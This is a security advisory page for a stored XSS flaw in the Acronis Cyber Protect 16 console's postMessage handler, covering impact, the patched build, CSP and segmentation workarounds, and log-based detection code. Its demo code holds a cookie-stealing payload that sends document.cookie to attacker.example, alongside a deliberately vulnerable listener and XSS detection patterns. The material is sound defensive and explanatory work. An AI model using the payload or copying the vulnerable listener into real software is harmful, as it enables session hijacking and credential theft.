CVE-2024-55541
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Acronis Cyber Protect 16 lets an attacker inject script into the management console through a postMessage handler that does not validate the sender's origin. In the browser of a logged-in user the injected script runs with that user's session, so it can hijack the session, steal credentials, or perform actions in the console on the user's behalf. All installations of Acronis Cyber Protect 16 before build 39169 on Linux and Windows are affected.
💻 Affected Systems
- Acronis Cyber Protect 16
📦 What is this software?
Acronis Cyber Protect 16 is a combined backup and endpoint-protection platform. Administrators manage agents, backup plans and protected hosts through a browser-based management console, and that web console is where this vulnerability lives.
⚠️ Risk & Real-World Impact
Worst Case
An attacker who hijacks an authenticated administrator session can take over the account, exfiltrate backup data, or use the console's management functions against the managed hosts, up to ransomware deployment
Likely Case
Session hijacking, credential theft, or unauthorized administrative actions within the application
If Mitigated
Limited impact with proper network segmentation and user privilege restrictions
🎯 Exploit Status
Exploitation requires either user interaction (a logged-in console user loads an attacker-controlled page that holds a reference to the console window, for example because it opened or framed it, and posts a message into it) or enough access to inject a payload that the console later renders. The attacker needs no Acronis credentials of their own.
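The following is an added example, not Acronis code and not taken from the advisory: it shows the class of bug described above (a window message listener that trusts any sender and writes the message into an HTML sink) beside a hardened listener. It runs under Node, so the DOM sink is simulated by a small renderer object that records what would have been written into the page. The console origin, the listener names and the message shape are assumptions for illustration.

```javascript
// Added example, not Acronis code: a postMessage listener without origin
// validation next to a hardened one. Runs under Node; the HTML sink
// (element.innerHTML) is simulated by a renderer that records writes.
// The origin, names and message shapes below are assumptions.

const CONSOLE_ORIGIN = 'https://backup.example.internal:9877'; // assumed console origin

// Simulated HTML sink; in the real page this would be `el.innerHTML = html`.
function makeRenderer() {
  const writes = [];
  return { writes, setHtml: (html) => { writes.push(html); } };
}

// Vulnerable listener: no event.origin check, raw string into an HTML sink.
// Any page that holds a reference to the console window (it opened the console
// with window.open, or embeds it in an iframe) can post here.
function vulnerableHandler(renderer) {
  return function onMessage(event) {
    const data = JSON.parse(event.data);
    renderer.setHtml(`<div class="notice">${data.text}</div>`);
    return true; // message accepted and rendered
  };
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Hardened listener: exact-match origin allow-list (never "*"), strict shape
// check on the parsed message, and HTML-escaping before anything hits the sink.
function hardenedHandler(renderer, allowedOrigins = [CONSOLE_ORIGIN]) {
  return function onMessage(event) {
    if (!allowedOrigins.includes(event.origin)) return false; // drop silently
    let data;
    try { data = JSON.parse(event.data); } catch (_) { return false; }
    if (data === null || typeof data !== 'object' || typeof data.text !== 'string') return false;
    renderer.setHtml(`<div class="notice">${escapeHtml(data.text)}</div>`);
    return true;
  };
}

// Constructed messages: one the console itself would send, one from a lure page.
const benignMsg = {
  origin: CONSOLE_ORIGIN,
  data: JSON.stringify({ text: 'Backup finished' }),
};
const hostileText = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
const hostileMsg = {
  origin: 'https://attacker.example',
  data: JSON.stringify({ text: hostileText }),
};

// Drive both listeners with the same messages and report what each did.
function demo() {
  const vuln = makeRenderer();
  const hard = makeRenderer();
  const onVuln = vulnerableHandler(vuln);
  const onHard = hardenedHandler(hard);
  return {
    vulnAcceptedHostile: onVuln(hostileMsg),          // true: payload reached the sink
    vulnHtml: vuln.writes[0],
    hardRejectedHostile: onHard(hostileMsg) === false, // true: wrong origin, dropped
    hardAcceptedBenign: onHard(benignMsg),            // true
    hardHtml: hard.writes[0],
    // Defence in depth: even a message from the allowed origin is escaped.
    sameOriginHtml: (onHard({ origin: CONSOLE_ORIGIN, data: hostileMsg.data }), hard.writes[1]),
  };
}

console.log(demo());
```

The origin check alone closes the path the advisory describes; the escaping is there because a listener that is later reused for a different message source would otherwise reopen it.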
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Build 39169 or later
Vendor Advisory: https://security-advisory.acronis.com/advisories/SEC-3647
Restart Required: Yes
Instructions:
1. Download Acronis Cyber Protect 16 build 39169 or later from the official Acronis portal
2. Backup current configuration
3. Install the update following Acronis documentation
4. Restart the Acronis Cyber Protect service
5. Verify successful update in management console
🔧 Temporary Workarounds
Content Security Policy (CSP) Implementation
Add a strict CSP header on the web server or reverse proxy in front of the console to restrict where scripts may load from and to block inline script:
Content-Security-Policy: script-src 'self'
This blocks inline <script> blocks and inline event handlers such as onerror= that an injected payload relies on, but it does not stop the vulnerable listener from accepting untrusted messages, and a header that forbids inline script may break parts of the console that depend on it. Test on a non-production instance first, or deploy it as Content-Security-Policy-Report-Only to find breakage before enforcing.
Network Segmentation
Restrict access to the Acronis management interface to trusted networks only
Configure firewall rules to limit access to Acronis ports (e.g., 9876, 443) to authorized IPs only. This narrows who can reach the console directly; it does not protect an administrator whose browser is already logged in and visits an attacker-controlled page.
🧯 If You Can't Patch
- Implement strict network segmentation to isolate Acronis management interface from untrusted networks
- Enable multi-factor authentication and enforce least privilege access controls for all user accounts
🔍 How to Verify
Check if Vulnerable:
Any build below 39169 is vulnerable. Read the build number in the management console or from a shell on the management server with the command below.
Check Version:
acronis_cyber_protect --version
Verify Fix Applied:
Verify version shows build 39169 or higher in management console
📡 Detection & Monitoring
Log Indicators:
postMessage is a browser-side API; the console's server never sees the messages themselves, so server-side indicators are indirect:
- Console requests whose Referer header points to an origin other than the console's own
- Script-like content (<script, onerror=, javascript:) in URL parameters or in stored fields such as names and comments
- Multiple failed authentication attempts followed by a successful login, or an existing session reused from a new IP address
Network Indicators:
- Unusual outbound connections from the Acronis server, or from administrators' workstations to unknown hosts shortly after a console session
- Script-like payloads in HTTP request parameters or bodies sent to the console
SIEM Query (template: source, event and the values are placeholders that must be mapped to the fields your log source actually emits, since postMessage calls happen in the browser and are not normally server-logged):
source="acronis_logs" AND (event="postMessage" OR event="xss_attempt")
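As an added example (not from the advisory or the vendor), the indirect indicators above turned into detection logic over constructed web-server access-log lines: requests whose URL-decoded path carries script-like content, and requests whose Referer comes from an origin other than the console's own. The log format (Apache/nginx "combined"), the hostnames and the sample lines are constructed for the example; the console host and the pattern list are assumptions to adapt to your deployment.

```javascript
// Added example, not vendor code: scan access-log lines for the surrounding
// activity of a postMessage-driven XSS (the lure page that opened the console,
// and script-like content in requests). Format, hosts and lines are constructed.

const CONSOLE_HOST = 'backup.example.internal'; // assumed console hostname

// Constructed lines in "combined" log format (ip ident user [ts] "req" status bytes "referer" "ua").
const SAMPLE_LOG = `
10.0.0.5 - admin [12/Mar/2025:10:01:02 +0000] "GET /api/backups HTTP/1.1" 200 512 "https://backup.example.internal/" "Mozilla/5.0"
10.0.0.5 - admin [12/Mar/2025:10:01:09 +0000] "GET /ui/?notice=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 42 "https://attacker.example/lure.html" "Mozilla/5.0"
10.0.0.5 - admin [12/Mar/2025:10:01:10 +0000] "POST /api/settings HTTP/1.1" 200 12 "https://backup.example.internal/ui/" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2025:10:02:00 +0000] "GET /ui/ HTTP/1.1" 200 1024 "-" "curl/8.0"
`;

const LINE_RE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Fragments that commonly appear in XSS payloads once the URL is decoded.
const SCRIPT_PATTERNS = [/<script/i, /\bon\w+\s*=/i, /javascript:/i, /<img[^>]*src/i];

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, user, ts, method, path, status, referer, ua] = m;
  return { ip, user, ts, method, path, status: Number(status), referer, ua };
}

// Decode once; malformed escapes are left as-is rather than throwing.
function decode(s) { try { return decodeURIComponent(s); } catch (_) { return s; } }

function refererHost(referer) {
  if (!referer || referer === '-') return null;
  try { return new URL(referer).host; } catch (_) { return null; }
}

// Findings for one parsed request; an empty array means nothing suspicious.
function inspect(req) {
  const findings = [];
  const decoded = decode(req.path);
  if (SCRIPT_PATTERNS.some((re) => re.test(decoded))) findings.push('script-like payload in request path');
  const host = refererHost(req.referer);
  if (host && host !== CONSOLE_HOST) findings.push(`referer from foreign origin ${host}`);
  return findings;
}

// Parse every line, keep only requests with at least one finding.
function scanLog(text) {
  return text.split('\n').map((l) => l.trim()).filter(Boolean)
    .map(parseLine).filter(Boolean)
    .map((req) => ({ ip: req.ip, user: req.user, path: req.path, findings: inspect(req) }))
    .filter((r) => r.findings.length > 0);
}

console.log(scanLog(SAMPLE_LOG));
```

The Referer signal only fires when the lure page navigates or opens the console with a referrer; a page that uses rel="noreferrer" or a referrer policy of no-referrer hides it, so treat it as one indicator among several rather than a gate.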